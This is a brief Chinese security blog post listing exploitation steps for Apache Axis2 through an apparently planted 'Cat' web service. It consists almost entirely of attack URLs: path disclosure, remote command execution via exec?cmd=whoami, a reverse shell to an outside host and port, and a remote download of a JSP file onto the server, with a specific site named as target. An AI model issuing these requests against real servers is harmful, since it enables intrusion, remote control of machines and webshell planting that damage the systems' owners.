蜗蜗侠's Blog-关注网络安全移动版

主页 > 技术笔记 >

Axis2漏洞利用

axis2漏洞利用

getClassPath 爆路径

axis2/services/Cat/exec?cmd=whoam 命令执行

axis2/services/Cat/shell?host=192.168.76.1&port=2222 反弹shell

D:/test/webapps/axis2/WEB-INF/classes/

http://blog.icxun.cn/axis2/services/Cat/exec?cmd=whoami

http://blog.icxun.cn/axis2/services/Cat/getClassPath

http://blog.icxun.cn/axis2/services/config/download?url=http://XXXX或IP:2475/test.jsp&path=路径test.jsp   远程下载

(责任编辑:蜗蜗侠)